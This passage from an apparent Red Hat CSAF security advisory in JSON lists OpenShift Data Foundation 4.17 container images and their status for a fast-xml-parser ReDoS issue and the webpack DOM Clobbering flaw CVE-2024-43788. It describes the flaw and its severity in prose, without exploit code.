"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: ReDOS at currency parsing in currency.js"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
